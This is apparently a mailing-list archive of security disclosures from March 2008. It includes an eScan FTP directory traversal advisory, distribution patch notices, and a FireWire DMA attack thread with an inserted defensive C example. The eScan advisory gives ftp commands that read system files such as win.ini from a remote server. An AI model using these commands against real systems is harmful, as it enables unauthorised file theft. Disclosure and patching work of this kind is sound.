Platforms:    Windows
Bug:          directory traversal
Exploitation: remote
Date:         06 Mar 2008
Author:       Luigi Auriemma
              e-mail: aluigi at autistici.org
              web:    aluigi.org

#######################################################################

1) Introduction
2) Bug
3) The Code
4) Fix

#######################################################################

===============
1) Introduction
===============

From vendor's website:
"The Powerful Management Console of eScan provides options for system
administrators to remotely administer a vast network of clients. It
also allows them to remotely install eScan, deploy upgrades and updates
and enforce an Integrated Security Policy for the entire Enterprise."

#######################################################################

======
2) Bug
======

The eScan Server (eserv.exe) listens on port 2021 for FTP connections
using c:\pub as root path.

Although the server tries to avoid possible directory traversal attacks,
for example by rejecting the dotdot patterns, it is still possible for an
attacker to download any file from the disk of the remote system simply
by applying a slash or a backslash at the beginning of the filename for
selecting the root path of the disk.
For example /boot.ini, \windows\win.ini and so on.

Only downloading files is allowed by the server, so deleting or
uploading custom files is not possible.

#######################################################################

===========
3) The Code
===========

ftp://SERVER:2021//windows/win.ini

or manually:

  ftp -A
  open SERVER 2021
  get /windows/win.ini local_win.ini

#######################################################################

======
4) Fix
======

No fix

#######################################################################

---
Luigi Auriemma
http://aluigi.org

From skx at debian.org Thu Mar 6 18:36:59 2008
From: skx at debian.org (Steve Kemp)
Date: Thu, 6 Mar 2008 18:36:59 +0000
Subject: [Full-disclosure] [SECURITY] [DSA 1513-1] New lighttpd packages fix CGI source disclosure
Message-ID: <20080306183659.GA24810@steve.org.uk>

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------------------------
Debian Security Advisory DSA-1513-1                  security at debian.org
http://www.debian.org/security/                               Steve Kemp
March 06, 2008                        http://www.debian.org/security/faq
- ------------------------------------------------------------------------

Package        : lighttpd
Vulnerability  : information disclosure
Problem type   : remote
Debian-specific: no
CVE Id(s)      : CVE-2008-1111

It was discovered that lighttpd, a fast webserver with minimal memory
footprint, would display the source to CGI scripts if their execution
failed in some circumstances.

For the stable distribution (etch), this problem has been fixed in version
1.4.13-4etch5.

For the unstable distribution, this problem will be fixed soon.

We recommend that you upgrade your lighttpd package.

Upgrade instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 4.0 alias etch
- -------------------------------

  These files will probably be moved into the stable distribution on
  its next update.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce at lists.debian.org
Package info: `apt-cache show ' and http://packages.debian.org/
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.6 (GNU/Linux)

iD8DBQFH0DlqwM/Gs81MDZ0RAhdHAKDWqNXksNw2GvPB32Jv6aIXZYTrfgCeOejf
grjQ1I2/z2Et1It0SKt1hfk=
=dNit
-----END PGP SIGNATURE-----

From Valdis.Kletnieks at vt.edu Thu Mar 6 18:24:15 2008
From: Valdis.Kletnieks at vt.edu (Valdis.Kletnieks at vt.edu)
Date: Thu, 06 Mar 2008 13:24:15 -0500
Subject: [Full-disclosure] Exploring the UNKNOWN: Scanning the Internet via SNMP!
In-Reply-To: Your message of "Thu, 06 Mar 2008 09:13:05 EST." <5d80962a0803060613m63675c6fl57e960e53526e79f@mail.gmail.com>
References: <20080304085355.GA19264@suse.de> <1865973b0803050454p11a65a51o1ca9898bfdd83159@mail.gmail.com> <8805f1180803050520h4360a708j2b2122d05bfffc09@mail.gmail.com> <47CEC5DF.2030000@s0ftpj.org> <47CFEE6B.6080005@s0ftpj.org> <5d80962a0803060613m63675c6fl57e960e53526e79f@mail.gmail.com>
Message-ID: <14172.1204827855@turing-police.cc.vt.edu>

On Thu, 06 Mar 2008 09:13:05 EST, Static Rez said:

> Isn't it true that a TCP packet is typically 20 bytes, and a UDP packet
> about 8? This is minus any additional data that has been added to the
> packet. If this is true, then depending on the size of the pipe your sending
> the data through, and the amount of congestion there might be, a UDP packet
> would more easily and quickly hit its destination.

If your network is so congested that the difference between a min-sized
TCP packet and a min-sized UDP packet matters, you have *bigger* problems...

(In reality, most NICs will refuse to blat out a packet much smaller than
64 bytes or so - there were a number of info-disclosure issues with some
drivers that would try to send a 56 byte packet, and failed to zero out the
8 trailing bytes).

From tim-security at sentinelchicken.org Thu Mar 6 20:00:09 2008
From: tim-security at sentinelchicken.org (Tim)
Date: Thu, 6 Mar 2008 12:00:09 -0800
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local>
References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local>
Message-ID: <20080306200009.GB5138@sentinelchicken.org>

> What are the implications for firewire device compatibility of doing
> this?

I am no expert on ieee1394, but I have read up a bit on this and tested
Metlstorm's memory dumping tool and here's what I understand:

Firewire chipsets allow drivers to configure a particular memory range
which is open to access by DMA devices. Since the memory transfers
occur completely without software intervention, the only way to restrict
this is to tell the chip ahead of time what to allow and what not to
allow.

Before these tools came out, most free OSes simply opened up access
completely to physical memory for any device. However, Windows would
not do this. It would only open up access to devices that it thought
needed DMA. This is why Metlstorm had to make his Linux machine behave
like an iPod to fool Windows into spreading its legs.

Since the exploit tools came out for this, free OSes quickly started
providing options to tell the chips not to open up access. I have
tested the Linux drivers with the phys_dma=0 option, and found that some
disk devices worked fine while others did not. I can confirm that the
memory dumping tools did not work with this option set.

Of course this is not an optimal fix. The drivers should just
automatically restrict the DMA accesses in real time to a range that is
safe but still permits devices to use it. (Presumably to buffers
allocated specifically for I/O.) Not sure if some devices would still
have problems with this, but I think this is the intended operation of
ieee1394 based on the specs and I'd imagine it would work on a greater
number of devices than having it disabled completely.

Someone please correct me if I'm wrong on any of this.

tim

From Larry at larryseltzer.com Thu Mar 6 20:13:33 2008
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Thu, 6 Mar 2008 15:13:33 -0500
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <20080306200009.GB5138@sentinelchicken.org>
References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F12@becca.LarrySeltzer.local>

>>...Windows would not do this. It would only open up access to devices that it thought needed DMA. This is why Metlstorm had to make his Linux machine behave like an iPod to fool Windows into spreading its legs.

So the iPod software opens up the whole address space? I don't get it.

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.pcmag.com/securitywatch/
Contributing Editor, PC Magazine
larry.seltzer at ziffdavisenterprise.com

From tim-security at sentinelchicken.org Thu Mar 6 20:20:28 2008
From: tim-security at sentinelchicken.org (Tim)
Date: Thu, 6 Mar 2008 12:20:28 -0800
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F12@becca.LarrySeltzer.local>
References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F12@becca.LarrySeltzer.local>
Message-ID: <20080306202028.GC5138@sentinelchicken.org>

> >>...Windows would not do this. It would only open up access to devices
> that it thought needed DMA. This is why Metlstorm had to make his Linux
> machine behave like an iPod to fool Windows into spreading its legs.
>
> So the iPod software opens up the whole address space? I don't get it.

No, the iPod device signature makes Windows drivers think it should
allow DMA access for that device because it detects it as a disk device.
Other disk device signatures would likely work the same way, that's just
the one he happened to emulate.

tim

From lericksen at sbcglobal.net Thu Mar 6 20:18:31 2008
From: lericksen at sbcglobal.net (Leif Ericksen)
Date: Thu, 06 Mar 2008 14:18:31 -0600
Subject: [Full-disclosure] Chinese backdoors "hidden in router firmware"
In-Reply-To: <6450e99d0803060146m5ff83578pbe3cd9d4beac1303@mail.gmail.com>
References: <6450e99d0803051509v52ac901dhce9171b9324ea7@mail.gmail.com> <20080306092153.GA1626@chaotica> <6450e99d0803060146m5ff83578pbe3cd9d4beac1303@mail.gmail.com>
Message-ID: <1204834711.2565.29.camel@shadrack.cipsecurity.us>

Gee Echelon is that not OLD news like news that is over 10 years old???
I remember hearing about echelon at the very least 10-11 years ago.

--
Leif Ericksen

On Thu, 2008-03-06 at 20:46 +1100, Ivan . wrote:
> so what? It doesn't have to make specific ascertains. The fact of the
> matter is that government sponsored corporate/industrial espionage
> happens all the time.
>
> Echelon spy network revealed
> http://news.bbc.co.uk/1/hi/world/503224.stm
>
> Echelon: Government spying breeds business distrust
> http://news.zdnet.co.uk/itmanagement/0,1000000308,2079881,00.htm
>
> Update: America uses Echelon to spy on Britain
> http://news.zdnet.co.uk/security/0,1000000189,2079921,00.htm
>
> On Thu, Mar 6, 2008 at 8:21 PM, wrote:
> > COULD, this article makes no specific claims. the chinese government COULD have an audio recording device hidden inside your asshole at this very moment.
> >
> > On Thu, Mar 06, 2008 at 10:09:53AM +1100, Ivan . wrote:
> > > http://www.pcpro.co.uk/news/173883/chinese-backdoors-hidden-in-router-firmware.html

From tim-security at sentinelchicken.org Thu Mar 6 20:29:18 2008
From: tim-security at sentinelchicken.org (Tim)
Date: Thu, 6 Mar 2008 12:29:18 -0800
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <4255c2570803061219p649b2cfr73cc8b881c49f203@mail.gmail.com>
References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <4255c2570803061219p649b2cfr73cc8b881c49f203@mail.gmail.com>
Message-ID: <20080306202918.GE5138@sentinelchicken.org>

An anonymous list lurker asked me off-list to answer this question for
"public gratification":

> Can this feature be leveraged without drivers on the target system?
> IOW, if one just unloads (or doesn't load) the firewire driver, is it
> still exploitable?

No, I don't believe so. At least on Linux, the drivers have to
explicitly open up access when they are loaded for the attack to work.
By the chipset access restrictions are prevent this. Of course YMMV on
particular pieces of hardware. There's just one vendor (Texas
Instruments) who produces the vast majority of these chipsets though, so
I doubt there's a large amount of variation from system to system.

tim

From Larry at larryseltzer.com Thu Mar 6 20:35:46 2008
From: Larry at larryseltzer.com (Larry Seltzer)
Date: Thu, 6 Mar 2008 15:35:46 -0500
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <20080306202028.GC5138@sentinelchicken.org>
References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F12@becca.LarrySeltzer.local> <20080306202028.GC5138@sentinelchicken.org>
Message-ID: <0273B67044957C41BD71D12EBA2E00AE252F13@becca.LarrySeltzer.local>

>>No, the iPod device signature makes Windows drivers think it should allow DMA access for that device because it detects it as a disk device.
>>Other disk device signatures would likely work the same way, that's just the one he happened to emulate.

Is it not possible for Windows (or any OS) to open up DMA for a device only to a certain range?

If not, what options are available?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.pcmag.com/securitywatch/
Contributing Editor, PC Magazine
larry.seltzer at ziffdavisenterprise.com

From tim-security at sentinelchicken.org Thu Mar 6 20:44:19 2008
From: tim-security at sentinelchicken.org (Tim)
Date: Thu, 6 Mar 2008 12:44:19 -0800
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F13@becca.LarrySeltzer.local>
References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local> <20080306200009.GB5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F12@becca.LarrySeltzer.local> <20080306202028.GC5138@sentinelchicken.org> <0273B67044957C41BD71D12EBA2E00AE252F13@becca.LarrySeltzer.local>
Message-ID: <20080306204419.GG5138@sentinelchicken.org>

> Is it not possible for Windows (or any OS) to open up DMA for a device
> only to a certain range?
>
> If not, what options are available?

I have various forms of RSI and don't feel like typing it again:

On Thu, Mar 06, 2008 at 12:00:09PM -0800, Tim wrote:
> [...]
> Of course this is not an optimal fix. The drivers should just
> automatically restrict the DMA accesses in real time to a range that is
> safe but still permits devices to use it. (Presumably to buffers
> allocated specifically for I/O.) Not sure if some devices would still
> have problems with this, but I think this is the intended operation of
> ieee1394 based on the specs and I'd imagine it would work on a greater
> number of devices than having it disabled completely.
> [...]

So yes, this is possible. AFAIK, driver writers on all sides have just
been lazy. At least with free OSes they have a lame hack to protect
you.

tim

From security at mandriva.com Thu Mar 6 21:17:33 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 06 Mar 2008 14:17:33 -0700
Subject: [Full-disclosure] [ MDVSA-2008:061 ] - Updated mailman packages fix multiple XSS vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

_______________________________________________________________________

Mandriva Linux Security Advisory                         MDVSA-2008:061
http://www.mandriva.com/security/
_______________________________________________________________________

Package : mailman
Date    : March 6, 2008
Affected: 2007.0, 2007.1, 2008.0, Corporate 3.0, Corporate 4.0
_______________________________________________________________________

Problem Description:

Multiple cross-site scripting (XSS) vulnerabilities were found in
Mailman prior to version 2.1.10b1, which allow remote attackers to
inject arbitrary web script or HTML via editing templates and the
list's info attribute in the web administrator interface.

The updated packages have been patched to correct these issues.
_______________________________________________________________________

References:

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0564
_______________________________________________________________________

To upgrade automatically use MandrivaUpdate or urpmi. The verification
of md5 checksums and GPG signatures is performed automatically for you.

All packages are signed by Mandriva for security. You can obtain the
GPG public key of the Mandriva Security Team by executing:

  gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98

You can view other update advisories for Mandriva Linux at:

  http://www.mandriva.com/security/advisories

If you want to report vulnerabilities, please contact

  security_(at)_mandriva.com
_______________________________________________________________________

Type Bits/KeyID     Date       User ID
pub  1024D/22458A98 2000-07-10 Mandriva Security Team
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.8 (GNU/Linux)

iD8DBQFH0DOQmqjQ0CJFipgRAun/AKCeOTnmEALAC0Psif3vTGOrTDFO1QCfWd5n
xgQxJS4lADPQU5IAIMmKSds=
=TWJO
-----END PGP SIGNATURE-----

From thor at hammerofgod.com Thu Mar 6 21:11:43 2008
From: thor at hammerofgod.com (Thor (Hammer of God))
Date: Thu, 6 Mar 2008 13:11:43 -0800
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To: <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local>
References: <1204732416.6997.53.camel@b4byl0n> <096A04F511B7FD4995AE55F13824B8332F1E35@contoso> <20080305193745.A25582@gwyn.tux.org> <0273B67044957C41BD71D12EBA2E00AE252F03@becca.LarrySeltzer.local>
Message-ID:

> -----Original Message-----
> From: Larry Seltzer [mailto:Larry at larryseltzer.com]
> Sent: Thursday, March 06, 2008 9:51 AM
> To: Peter Watkins; Roger A.
Grimes > Cc: Bernhard Mueller; Full Disclosure; Bugtraq > Subject: RE: Firewire Attack on Windows Vista > > >>Roger, you should note that Adam's "Hit by a Bus" paper includes > information about how Linux users can load their OS' Firewire driver in > a way that should disallow physical memory DMA access, and close this > attack vector. > > What are the implications for firewire device compatibility of doing > this? Probably the same as just disabling the 1394 bus host controller in Vista ;) t From jamie at canonical.com Thu Mar 6 21:30:37 2008 From: jamie at canonical.com (Jamie Strandboge) Date: Thu, 6 Mar 2008 16:30:37 -0500 Subject: [Full-disclosure] [USN-582-2] Thunderbird vulnerabilities Message-ID: <20080306213037.GB31014@severus.strandboge.com> =========================================================== Ubuntu Security Notice USN-582-2 March 06, 2008 mozilla-thunderbird https://launchpad.net/bugs/197504 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS Ubuntu 6.10 Ubuntu 7.04 This advisory also applies to the corresponding versions of Kubuntu, Edubuntu, and Xubuntu. The problem can be corrected by upgrading your system to the following package versions: Ubuntu 6.06 LTS: mozilla-thunderbird 1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.06.1 Ubuntu 6.10: mozilla-thunderbird 1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.6.10.1 Ubuntu 7.04: mozilla-thunderbird 1.5.0.13+1.5.0.15~prepatch080227-0ubuntu0.7.04.1 After a standard system upgrade you need to restart Thunderbird to effect the necessary changes. Details follow: USN-582-1 fixed several vulnerabilities in Thunderbird. The upstream fixes were incomplete, and after performing certain actions Thunderbird would crash due to memory errors. This update fixes the problem. We apologize for the inconvenience. 
Original advisory details:

 It was discovered that Thunderbird did not properly set the size of a
 buffer when parsing an external-body MIME-type. If a user were to open
 a specially crafted email, an attacker could cause a denial of service
 via application crash or possibly execute arbitrary code as the user.
 (CVE-2008-0304)

 Various flaws were discovered in Thunderbird and its JavaScript
 engine. By tricking a user into opening a malicious message, an
 attacker could execute arbitrary code with the user's privileges.
 (CVE-2008-0412, CVE-2008-0413)

 Various flaws were discovered in the JavaScript engine. By tricking
 a user into opening a malicious message, an attacker could escalate
 privileges within Thunderbird, perform cross-site scripting attacks
 and/or execute arbitrary code with the user's privileges.
 (CVE-2008-0415)

 Gerry Eisenhaur discovered that the chrome URI scheme did not properly
 guard against directory traversal. Under certain circumstances, an
 attacker may be able to load files or steal session data. Ubuntu is
 not vulnerable in the default installation. (CVE-2008-0418)

 Flaws were discovered in the BMP decoder. By tricking a user into
 opening a specially crafted BMP file, an attacker could obtain
 sensitive information.
 (CVE-2008-0420)

Updated packages for Ubuntu 6.06 LTS:

From tim-security at sentinelchicken.org Thu Mar 6 22:30:22 2008
From: tim-security at sentinelchicken.org (Tim)
Date: Thu, 6 Mar 2008 14:30:22 -0800
Subject: [Full-disclosure] Firewire Attack on Windows Vista
In-Reply-To:
References:
Message-ID: <20080306223022.GI5138@sentinelchicken.org>

Hi Glenn,

> It should be realized though that fixing this is not necessarily a simple
> thing, nor are architectural considerations missing.

I most probably understated the difficulty of implementing a safe
ieee1394 DMA driver earlier. However, it's one of those things where
the drivers ought to at least default to a safe configuration and allow
those who like operating in the "wild west" for the purposes of speed to
do so.

> As for what can be done by Windows (as opposed to "any OS"), that is perhaps
> limited by the great range of underlying hardware. A compromise which might allow
> DMA to/from disks, tapes, or CDs but disallow it for most other peripherals
> might turn out to be the best general solution available, or something
> comparably ugly.

In the specific case of FireWire, Windows already does this, but that is
exactly how the restrictions were bypassed. You can't trust a disk
device any more than any other device, since a laptop can simply emulate
a storage device.

cheers,
tim

From Glenn.Everhart at chase.com Thu Mar 6 21:13:15 2008
From: Glenn.Everhart at chase.com (Glenn.Everhart at chase.com)
Date: Thu, 6 Mar 2008 16:13:15 -0500
Subject: [Full-disclosure] Firewire Attack on Windows Vista
Message-ID:

Certainly in VMS there is DMA opened up, but only to buffers that are known
and checked to be legal for such. This is a source of considerable complexity
in the drivers, and depending on hardware architecture (number of control
registers available, for example, to control DMA channels) limits both
number of concurrent operations and size of some operations. For example, the
max size of magtape records is limited, in part to conserve such bandwidth
for use with disks.

If driver writers adopt a "wild-west" approach where the DMA space is left
wide open, obviously the security of anything within memory is totally open
to whatever a smart peripheral may do.

It should be realized though that fixing this is not necessarily a simple
thing, nor are architectural considerations missing. But with the advent of
more and more smart "peripherals" (at least some of which are commonly user
programmable), open DMA access amounts to peek/poke control over all of
memory and the abdication by the OS involved of any pretense of security
whatever.

As for what can be done by Windows (as opposed to "any OS"), that is perhaps
limited by the great range of underlying hardware. A compromise which might allow
DMA to/from disks, tapes, or CDs but disallow it for most other peripherals
might turn out to be the best general solution available, or something
comparably ugly.

Glenn Everhart

-----Original Message-----
From: full-disclosure-bounces at lists.grok.org.uk [mailto:full-disclosure-bounces at lists.grok.org.uk]On Behalf Of Larry Seltzer
Sent: Thursday, March 06, 2008 3:36 PM
To: Tim
Cc: Full Disclosure; Bugtraq
Subject: Re: [Full-disclosure] Firewire Attack on Windows Vista

>>No, the iPod device signature makes Windows drivers think it should
allow DMA access for that device because it detect it as a disk device.
>>Other disk device signatures would likely work the same way, that's
just the one he happened to emulate.

Is it not possible for Windows (or any OS) to open up DMA for a device
only to a certain range? If not, what options are available?

Larry Seltzer
eWEEK.com Security Center Editor
http://security.eweek.com/
http://blogs.pcmag.com/securitywatch/
Contributing Editor, PC Magazine
larry.seltzer at ziffdavisenterprise.com

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
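The restriction discussed in the messages above, DMA allowed only into buffers the driver has registered and checked rather than by the class a device claims, modelled as a policy check. This is an added example, not code from any poster or from VMS, Windows or Linux; every name, the fixed-size table and the sample addresses are assumptions of the example.

```c
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

/* Model only: on real hardware this decision has to be enforced by the
 * bus controller or an IOMMU, not by software after the transfer. */

/* Directions from the device's point of view (names are this example's own). */
enum { DIR_DEV_READS_MEM = 1u, DIR_DEV_WRITES_MEM = 2u };

/* Class the device reports about itself. The peer controls this value. */
enum dev_class { CLASS_OTHER, CLASS_STORAGE };

#define MAX_WINDOWS 8

struct dma_window {
    uint64_t base;  /* physical start of a buffer the driver has checked */
    uint64_t len;   /* length in bytes, never 0 for a live window */
    unsigned dir;   /* directions permitted for this buffer */
    bool     live;
};

struct dma_policy {
    struct dma_window win[MAX_WINDOWS];
};

/* Open a window for one I/O. Returns the slot, or -1 if the range is empty,
 * wraps the address space, names no valid direction, or the table is full. */
int dma_window_add(struct dma_policy *p, uint64_t base, uint64_t len, unsigned dir)
{
    const unsigned known = DIR_DEV_READS_MEM | DIR_DEV_WRITES_MEM;
    if (len == 0 || base > UINT64_MAX - len) return -1;
    if (dir == 0 || (dir & ~known) != 0) return -1;
    for (int i = 0; i < MAX_WINDOWS; i++) {
        if (!p->win[i].live) {
            p->win[i] = (struct dma_window){ base, len, dir, true };
            return i;
        }
    }
    return -1;
}

/* Close the window as soon as the I/O completes. */
void dma_window_remove(struct dma_policy *p, int slot)
{
    if (slot >= 0 && slot < MAX_WINDOWS) p->win[slot].live = false;
}

/* A request [addr, addr+len) passes only if it lies entirely inside one live
 * window that permits the direction. All arithmetic is done on offsets so a
 * length chosen to wrap past 2^64 cannot slip through. */
bool dma_request_allowed(const struct dma_policy *p, uint64_t addr,
                         uint64_t len, unsigned dir)
{
    if (len == 0 || dir == 0) return false;
    for (int i = 0; i < MAX_WINDOWS; i++) {
        const struct dma_window *w = &p->win[i];
        if (!w->live || (w->dir & dir) != dir) continue;
        if (addr < w->base) continue;
        uint64_t off = addr - w->base;      /* safe: addr >= base */
        if (off >= w->len) continue;
        if (len > w->len - off) continue;   /* safe: off < len of window */
        return true;
    }
    return false;
}

/* The class-based rule described in the thread, for contrast: the address
 * is never examined, only what the device says it is. */
bool class_based_allowed(enum dev_class claimed)
{
    return claimed == CLASS_STORAGE;
}

int main(void)
{
    struct dma_policy p = {0};
    /* Constructed sample: one 4 KiB read buffer at 0x100000. */
    int slot = dma_window_add(&p, 0x100000, 0x1000, DIR_DEV_WRITES_MEM);

    printf("inside window:        %d\n",
           dma_request_allowed(&p, 0x100800, 0x800, DIR_DEV_WRITES_MEM));
    printf("runs past the end:    %d\n",
           dma_request_allowed(&p, 0x100800, 0x801, DIR_DEV_WRITES_MEM));
    printf("wrong direction:      %d\n",
           dma_request_allowed(&p, 0x100000, 0x10, DIR_DEV_READS_MEM));
    printf("outside, claims disk: class rule=%d window rule=%d\n",
           class_based_allowed(CLASS_STORAGE),
           dma_request_allowed(&p, 0x0, 0x1000, DIR_DEV_READS_MEM));

    dma_window_remove(&p, slot);
    printf("after I/O completes:  %d\n",
           dma_request_allowed(&p, 0x100800, 0x800, DIR_DEV_WRITES_MEM));
    return 0;
}
```

The last contrast line is the point both posters make: the class rule says yes to anything that presents a storage signature, while the window rule rejects the same request because no checked buffer covers it.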

From security at mandriva.com Fri Mar 7 01:49:53 2008
From: security at mandriva.com (security at mandriva.com)
Date: Thu, 06 Mar 2008 18:49:53 -0700
Subject: [Full-disclosure] [ MDVSA-2008:062 ] - Updated Thunderbird packages fix multiple vulnerabilities
Message-ID:

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

 _______________________________________________________________________

 Mandriva Linux Security Advisory                         MDVSA-2008:062
 http://www.mandriva.com/security/
 _______________________________________________________________________

 Package : mozilla-thunderbird
 Date    : March 6, 2008
 Affected: 2007.1, 2008.0
 _______________________________________________________________________

 Problem Description:

 A number of security vulnerabilities have been discovered and corrected
 in the latest Mozilla Thunderbird program, version 2.0.0.12.

 This update provides the latest Thunderbird to correct these issues.
 _______________________________________________________________________

 References:

 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0304
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0412
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0413
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0415
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0418
 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-0591
 http://www.mozilla.org/security/announce/2008/mfsa2008-01.html
 http://www.mozilla.org/security/announce/2008/mfsa2008-03.html
 http://www.mozilla.org/security/announce/2008/mfsa2008-05.html
 http://www.mozilla.org/security/announce/2008/mfsa2008-08.html
 http://www.mozilla.org/security/announce/2008/mfsa2008-12.html
 _______________________________________________________________________

 Updated Packages:
76416369c4ef412e04ea937715a3810d 2008.0/i586/mozilla-thunderbird-en_GB-2.0.0.12-1mdv2008.0.i586.rpm c3241440673656224460c102f5c556d2 2008.0/i586/mozilla-thunderbird-enigmail-2.0.0.12-3mdv2008.0.i586.rpm fade8de3b7efac6a54d8f0f499f838de 2008.0/i586/mozilla-thunderbird-enigmail-ca-2.0.0.12-1mdv2008.0.i586.rpm 6d2de5d59d98c33af1841daa1b4787f3 2008.0/i586/mozilla-thunderbird-enigmail-cs-2.0.0.12-1mdv2008.0.i586.rpm 821fa427f5f92b11a21a4397798efdb4 2008.0/i586/mozilla-thunderbird-enigmail-de-2.0.0.12-1mdv2008.0.i586.rpm 53f2b2b90c773db98186560e2b660d3a 2008.0/i586/mozilla-thunderbird-enigmail-el-2.0.0.12-1mdv2008.0.i586.rpm 2409ab6c8d2000cf16b6394772edff05 2008.0/i586/mozilla-thunderbird-enigmail-es-2.0.0.12-1mdv2008.0.i586.rpm 7839eabdd8884587dbe6546495c2764f 2008.0/i586/mozilla-thunderbird-enigmail-es_AR-2.0.0.12-1mdv2008.0.i586.rpm 3ff14f6709db8363e4f209ea8b3c782a 2008.0/i586/mozilla-thunderbird-enigmail-fi-2.0.0.12-1mdv2008.0.i586.rpm a05a6413cbc9d3f83e5af365696bddc3 2008.0/i586/mozilla-thunderbird-enigmail-fr-2.0.0.12-1mdv2008.0.i586.rpm 59105e2565910f5ee46e3c6ae43e385d 2008.0/i586/mozilla-thunderbird-enigmail-hu-2.0.0.12-1mdv2008.0.i586.rpm 7e1f18fc17b2abae6093fa5b5b865bc3 2008.0/i586/mozilla-thunderbird-enigmail-it-2.0.0.12-1mdv2008.0.i586.rpm c357acb65692fc330f8353f5f893aab8 2008.0/i586/mozilla-thunderbird-enigmail-ja-2.0.0.12-1mdv2008.0.i586.rpm 93223c4d7e06d8458c692916ba0a0f22 2008.0/i586/mozilla-thunderbird-enigmail-ko-2.0.0.12-1mdv2008.0.i586.rpm e0329a9d3e8f526f281970f53e26288d 2008.0/i586/mozilla-thunderbird-enigmail-nb-2.0.0.12-1mdv2008.0.i586.rpm f82ce5aa1c860486b8443dace218e007 2008.0/i586/mozilla-thunderbird-enigmail-nl-2.0.0.12-1mdv2008.0.i586.rpm d89654119e6d4e7527d6eb9b974bc2fb 2008.0/i586/mozilla-thunderbird-enigmail-pl-2.0.0.12-1mdv2008.0.i586.rpm df2cce2c33483906ef8df615407bddd9 2008.0/i586/mozilla-thunderbird-enigmail-pt-2.0.0.12-1mdv2008.0.i586.rpm 2c9163e0eaec1a6af39fc75a2a50d618 
